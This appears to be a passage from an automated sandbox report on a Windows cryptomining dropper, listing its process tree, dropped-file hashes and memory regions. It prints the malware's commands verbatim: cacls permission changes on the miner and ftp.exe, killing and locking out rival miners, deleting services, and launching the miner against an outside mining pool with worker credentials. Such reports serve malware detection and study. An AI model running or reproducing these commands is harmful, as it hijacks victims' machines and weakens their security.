C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe --donate-level 1 --max-cpu-usage 75 -o o.oooooooooo.ga:80 -u x.0802c -p x -k >C:\Users\Admin\AppData\Local\Temp\CPU_log.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeC:\Users\Admin\AppData\Local\Temp\sqlageatc.exe --donate-level 1 --max-cpu-usage 75 -o o.oooooooooo.ga:80 -u x.0802c -p x -k3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d everyone1⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d everyone1⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"1⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d everyone1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempUpdate2.batMD5
e036a67c62e23322d319a434b21a1abb
SHA11f17415b94489df52bf42d044db6cee7f32d1a06
SHA256ee0279ddc0d862fef6681266d6606610e48a75b24115978da5fce0be021a0bbe
SHA51269d1af93a80a281666accb8f2053977e4292963b28ae827abaa9af10af2439a6e3da6f2ae9c613becbb19a6a174937129f251114daff91bace3855c385714f8d
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeMD5
07fa3c66a034839654211fd61dd52db1
SHA17646835976eda269b3cb9deb8d699857f7d152e6
SHA256d1d3d42b4251b323af26fd47b17d026f60091c8797713819d249c0560965477d
SHA512be3f1d0afb5693c989f500079151febd7adcc004341da33ad4283fc078abb48d90766ef9d3e88648135a42d03991f216851b68aef4d47b45b30413f2c45d43b3
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeMD5
07fa3c66a034839654211fd61dd52db1
SHA17646835976eda269b3cb9deb8d699857f7d152e6
SHA256d1d3d42b4251b323af26fd47b17d026f60091c8797713819d249c0560965477d
SHA512be3f1d0afb5693c989f500079151febd7adcc004341da33ad4283fc078abb48d90766ef9d3e88648135a42d03991f216851b68aef4d47b45b30413f2c45d43b3
-
memory/372-164-0x0000000000000000-mapping.dmp
-
memory/400-128-0x0000000000000000-mapping.dmp
-
memory/596-149-0x0000000000000000-mapping.dmp
-
memory/704-156-0x0000000000000000-mapping.dmp
-
memory/708-151-0x0000000000000000-mapping.dmp
-
memory/708-117-0x0000000000000000-mapping.dmp
-
memory/1016-162-0x0000000000000000-mapping.dmp
-
memory/1064-184-0x000001887F950000-0x000001887F960000-memory.dmpFilesize
64KB
-
memory/1064-185-0x000001887F970000-0x000001887F990000-memory.dmpFilesize
128KB
-
memory/1064-186-0x000001887F990000-0x000001887F9B0000-memory.dmpFilesize
128KB
-
memory/1064-187-0x000001887F9B0000-0x000001887F9D0000-memory.dmpFilesize
128KB
-
memory/1140-131-0x0000000000000000-mapping.dmp
-
memory/1196-159-0x0000000000000000-mapping.dmp
-
memory/1200-127-0x0000000000000000-mapping.dmp
-
memory/1228-132-0x0000000000000000-mapping.dmp
-
memory/1240-160-0x0000000000000000-mapping.dmp
-
memory/1300-180-0x0000000000000000-mapping.dmp
-
memory/1304-150-0x0000000000000000-mapping.dmp
-
memory/1428-133-0x0000000000000000-mapping.dmp
-
memory/1428-167-0x0000000000000000-mapping.dmp
-
memory/1692-141-0x0000000000000000-mapping.dmp
-
memory/1696-129-0x0000000000000000-mapping.dmp
-
memory/1780-135-0x0000000000000000-mapping.dmp
-
memory/1812-178-0x0000000000000000-mapping.dmp
-
memory/1812-145-0x0000000000000000-mapping.dmp
-
memory/1988-169-0x0000000000000000-mapping.dmp
-
memory/1988-136-0x0000000000000000-mapping.dmp
-
memory/2028-170-0x0000000000000000-mapping.dmp
-
memory/2144-168-0x0000000000000000-mapping.dmp
-
memory/2164-137-0x0000000000000000-mapping.dmp
-
memory/2236-176-0x0000000000000000-mapping.dmp
-
memory/2288-165-0x0000000000000000-mapping.dmp
-
memory/2456-171-0x0000000000000000-mapping.dmp
-
memory/2468-143-0x0000000000000000-mapping.dmp
-
memory/2496-118-0x00000000022C0000-0x00000000022CB000-memory.dmpFilesize
44KB
-
memory/2496-115-0x00000000022C0000-0x00000000022CB000-memory.dmpFilesize
44KB
-
memory/2640-138-0x0000000000000000-mapping.dmp
-
memory/2760-152-0x0000000000000000-mapping.dmp
-
memory/2764-157-0x0000000000000000-mapping.dmp
-
memory/2820-175-0x0000000000000000-mapping.dmp
-
memory/2856-147-0x0000000000000000-mapping.dmp
-
memory/2868-134-0x0000000000000000-mapping.dmp
-
memory/2868-166-0x0000000000000000-mapping.dmp
-
memory/2972-142-0x0000000000000000-mapping.dmp
-
memory/3004-158-0x0000000000000000-mapping.dmp
-
memory/3036-139-0x0000000000000000-mapping.dmp
-
memory/3036-173-0x0000000000000000-mapping.dmp
-
memory/3136-144-0x0000000000000000-mapping.dmp
-
memory/3180-161-0x0000000000000000-mapping.dmp
-
memory/3188-130-0x0000000000000000-mapping.dmp
-
memory/3192-121-0x0000000000000000-mapping.dmp
-
memory/3204-120-0x0000000000000000-mapping.dmp
-
memory/3240-163-0x0000000000000000-mapping.dmp
-
memory/3252-140-0x0000000000000000-mapping.dmp
-
memory/3284-126-0x0000000000000000-mapping.dmp
-
memory/3336-125-0x0000000000000000-mapping.dmp
-
memory/3348-155-0x0000000000000000-mapping.dmp
-
memory/3416-116-0x0000000000000000-mapping.dmp
-
memory/3488-122-0x0000000000000000-mapping.dmp
-
memory/3504-148-0x0000000000000000-mapping.dmp
-
memory/3652-174-0x0000000000000000-mapping.dmp
-
memory/3808-123-0x0000000000000000-mapping.dmp
-
memory/3820-146-0x0000000000000000-mapping.dmp
-
memory/3824-119-0x0000000000000000-mapping.dmp
-
memory/3828-154-0x0000000000000000-mapping.dmp
-
memory/3832-177-0x0000000000000000-mapping.dmp
-
memory/3836-179-0x0000000000000000-mapping.dmp
-
memory/3964-172-0x0000000000000000-mapping.dmp
-
memory/3996-124-0x0000000000000000-mapping.dmp
-
memory/4064-153-0x0000000000000000-mapping.dmp